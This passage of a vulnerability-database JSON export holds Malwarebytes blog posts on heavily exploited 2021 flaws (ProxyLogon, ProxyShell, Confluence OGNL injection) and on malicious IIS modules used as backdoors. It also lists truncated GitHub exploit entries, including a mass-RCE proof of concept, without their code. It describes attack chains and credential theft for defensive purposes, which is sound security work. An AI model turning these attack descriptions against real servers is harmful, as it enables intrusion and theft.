attackers to steal data and perform additional malicious actions.\n\nProxyLogon started out as a limited and targeted attack method attributed to a group called [Hafnium](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>). Unfortunately it went from limited and targeted attacks to a full-size panic in no time. Attackers started using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.\n\nMicrosoft has released a one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool will help customers who do not have dedicated security or IT teams to apply these security updates. Details, a [download link](<https://aka.ms/eomt>), user instructions, and more information can be found in the [Microsoft Security Response Center](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n\n## 5\\. CVE-2021-26084\n\n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is an Object-Graph Navigation Language (OGNL) injection vulnerability that exists in some versions of [Confluence Server and Data Center](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) that can allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. This was a zero-day vulnerability that was only patched after it was found to be actively exploited in the wild. An attacker could exploit the vulnerability by simply sending a specially crafted HTTP request containing a malicious parameter to a vulnerable install.\n\nShortly after the vulnerability was disclosed and a patch came out, researchers noticed massive scanning activity for vulnerable instances and crypto-miners started to use the vulnerability to run their code on unpatched servers.\n\nOn the [Confluence Support website](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) you can find a list of affected versions, instructions to upgrade, and a workaround for those that are unable to upgrade.\n\n## Lessons learned\n\nWhat does this list tell us to look out for in 2022?\n\nWell, first off, if you haven\u2019t patched one of the above we would urgently advise you to do so. And it wouldn\u2019t hurt to continue working down the [list](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) provided by CISA.\n\nSecond, you may have noticed a pattern in what made these vulnerabilities so popular to exploit:\n\n * **A large attack surface**. Popular and widely used software makes for a larger number of potential victims. The money is in the numbers.\n * **Internet-facing instances**. Remember, your Internet-connected software shares the Internet with every basement-dwelling criminal hacker in the world.\n * **Easy exploitability**. When vulnerabilities are easy to exploit, and PoCs are publicly available and easy to deploy, the number of potential threat actors goes up.\n\nSo, if you notice or hear about a vulnerability that meets these "requirements" move it to the top of your "to-patch" list.\n\nStay safe, everyone!\n\nThe post [The top 5 most routinely exploited vulnerabilities of 2021](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-29T16:28:20", "type": "malwarebytes", "title": "The top 5 most routinely exploited vulnerabilities of 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-2685", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-04-29T16:28:20", "id": "MALWAREBYTES:B8C767042833344389F6158273089954", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-27T16:38:26", "description": "The [Microsoft 365 Defender Research Team](<https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/>) has warned that attackers are increasingly leveraging Internet Information Services (IIS) extensions as covert backdoors into servers.\n\nIIS extensions are able to stay hidden in target environments and as such provide a long-term persistence mechanism for attackers.\n\n## IIS\n\nIIS is webserver software created by Microsoft that runs on Windows systems. Most commonly, organizations use IIS to host ASP.NET web applications and static websites. It can also be used as an FTP server, host WCF services, and be extended to host web applications built on other platforms such as PHP.\n\nExchange Server 2016 and Exchange Server 2019 automatically configure multiple Internet Information Services (IIS) virtual directories during the server installation. As a result, administrators are not always aware of the origin of some directories and their functionality.\n\n## IIS modules\n\nThe IIS 7 and above web server feature set is componentized into more than thirty independent modules. A module is either a Win32 DLL (native module) or a .NET 2.0 type contained within an assembly (managed module). Similar to a set of building blocks, modules are added to the server in order to provide the desired functionality for applications.\n\nMalicious IIS modules are near perfect backdoors. Once installed, they will respond to specifically crafted HTTP requests sent by the operator instructing the server to collect emails, add further malicious access, or use the compromised servers for clandestine purposes. These requests will seem normal to the unsuspicious eye.\n\n## IIS backdoors\n\nIIS backdoors are harder to detect since they mostly reside in the same directories as legitimate modules, and they follow the same code structure as clean modules. The actual backdoor code is hard to detect as such and that also makes it hard to determine the origin.\n\n## ProxyLogon and ProxyShell\n\nSome of the methods used to drop malicious IIS extensions are known as [ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>) and [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>). ProxyLogon consists of four vulnerabilities which can be combined to form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, the attackers deploy web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\nThe ProxyShell exploit is very similar to ProxyLogon and was discovered more recently. ProxyShell is a different attack chain designed to exploit three separate vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207.\n\n## Malicious behavior\n\nOn its blog, the Microsoft Team describes a custom IIS backdoor called FinanceSvcModel.dll which has a built-in capability to perform Exchange management operations, such as enumerating installed mailbox accounts and exporting mailboxes for exfiltration. What's interesting in this example is how the threat actor forced the system to use the WDigest protocol for authentication, resulting in lsass.exe retaining a copy of the user\u2019s plaintext password in memory. This allowed the threat actor to steal the actual passwords and not just the hashes.\n\nCredential stealing can be a goal by itself. But stolen credentials also allow the attackers to remain persistent in the environment, even if the primary backdoor is detected. Credential stealing modules monitor for specific requests to determine a sign-in activity and dump the provided credentials in a file the threat actor can retrieve later.\n\nGiven the rising energy prizes and the falling, yet still profitable, cryptocurrency exchange rates, we wouldn\u2019t be surprised to find servers abused for cryptomining. A few years ago we saw threat actors leveraging an [IIS 6.0 vulnerability](<https://www.bleepingcomputer.com/news/security/windows-servers-targeted-for-cryptocurrency-mining-via-iis-flaw/>) to take over Windows servers and install a malware strain that mined the Electroneum cryptocurrency.\n\n## Mitigation, detection, and remediation\n\nThere are several thing you can do to minimize the risk and consequences of a malicious IIS extension:\n\n * Keep your server software up to date to minimize the risk of infection.\n * Use security software that also covers your servers.\n * Regularly check loaded IIS modules on exposed IIS servers (notably Exchange servers), leveraging existing tools from the IIS servers suite.\n * Deploy a backup strategy that creates regular backups that are easy to deploy when needed.\n * Review permission and access policies, combined with credential hygiene.\n * Prioritize alerts that show patterns of server compromise. It can help to catch attacks in the exploratory phase, the period in which attackers spend time exploring the environment after gaining initial access.\n\nStay safe, everyone!\n\nThe post [IIS extensions are on the rise as backdoors to servers](<https://blog.malwarebytes.com/reports/2022/07/iis-extensions-are-on-the-rise-as-backdoors-to-servers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-27T13:58:06", "type": "malwarebytes", "title": "IIS extensions are on the rise as backdoors to servers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-07-27T13:58:06", "id": "MALWAREBYTES:B0F2474F776241731FE08EA7972E6239", "href": "https://blog.malwarebytes.com/reports/2022/07/iis-extensions-are-on-the-rise-as-backdoors-to-servers/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2021-12-10T15:20:04", "description": "# Exchange_IOC_Hunter\n\n#### Description:\n\nHunt for IOCs in IIS L...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T10:36:44", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26855"], "modified": "2021-03-17T10:22:07", "id": "F3D43FE5-47AE-591C-A2DD-8F92BC12D9A8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-15T01:18:31", "description": "### This project has been discontinued\n\nPlease use Microsoft too...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-05T08:22:07", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26858", "CVE-2021-26857", "CVE-2021-27065", "CVE-2021-26855"], "modified": "2022-02-14T23:14:09", "id": "37EE4A49-AEF7-5A71-AC1C-4B55CB94DD92", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:21:20", "description": "![](https://github.com/SCS-Labs/Images/raw/main/SCS%20-%20HAFNIU...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-11T21:18:29", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26855"], "modified": "2021-04-19T19:31:47", "id": "2481D5F6-C105-5158-B4AF-B67D7BA244A3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-12T14:43:07", "description": "# ProxyShell_POC\nPOC for ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-02T07:29:24", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34523", "CVE-2021-31207", "CVE-2021-34473"], "modified": "2022-03-12T13:42:54", "id": "E458F533-4B97-51A1-897B-1AF58218F2BF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T19:01:02", "description": "# ProxyShell\nProof of Concept Exploit for Microsoft Exchange CVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T15:34:03", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-23T18:03:46", "id": "2D0AC1C7-F656-5D6B-9FC2-79525014BE1E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:26:23", "description": "# ProxyLogon-Mass-RCE\n## Description\nPython for mass deploying p...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-23T17:09:30", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26857", "CVE-2021-26855"], "modified": "2021-05-23T17:23:03", "id": "D7D65B87-E44D-559F-B05B-6AED7C8659D5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-15T15:36:14", "description": "# CVE-2021-26855_SSRF\nCVE-2021-26855 Exchange ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-08T07:28:21", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26857", "CVE-2021-26855", "CVE-2021-26865", "CVE-2021-26858"], "modified": "2021-12-15T14:41:36", "id": "35B21CE7-1E51-5824-B70E-36480A6E8763", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-12T13:06:47", "description": "# HAFNIUM-IOC\nHafnium-IOC is a simple PowerShell script that run...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-03T17:36:18", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26858", "CVE-2021-26857", "CVE-2021-26865"], "modified": "2022-01-12T11:59:39", "id": "72EF4B3F-6CF3-5E4D-9B05-D4E27A7A9D1A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:24:19", "description": "# 106362522\n\u91dd\u5c0d\u8fd1\u671f\u5fae\u8edf\u516c\u5e03\u4fee\u88dc\u906d\u99ed\u5ba2\u653b\u64ca\u7684Exchange Server\u6f0f\u6d1e\u554f\u984c\uff0c\u53f0\u7063DEVCORE\u8868\u793a\u65e9\u57281\u67085...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-19T09:33:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2021-04-19T09:35:18", "id": "DFB437A9-A514-588D-8B48-A6C7C75EAD32", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-03T01:19:32", "description": "# ProxyLogon\n\nProxyLogon is the formally generic name for CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-16T07:31:25", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2022-03-02T19:09:09", "id": "B5E7199E-37EE-5CBA-A8B7-83061DD63E3D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-16T10:31:55", "description": "# Exch-CVE-2021-26855\nProxyLogon is the formally generic name fo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-14T14:23:34", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-02-16T09:48:52", "id": "B20A08C3-E06C-57C9-998A-C38174AEA7DC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:20:36", "description": "# Exchange SSRF toRCE Exploit\n\n\n\n**:warning:For educational and ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-15T09:02:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2021-10-24T06:16:43", "id": "D6AC5402-E5BA-5A55-B218-5D280FA9EA0D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:20:16", "description": "# CVE-2021-26855\nCVE-2021-26855, also known as Proxylogon, is a ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-11T19:35:35", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", 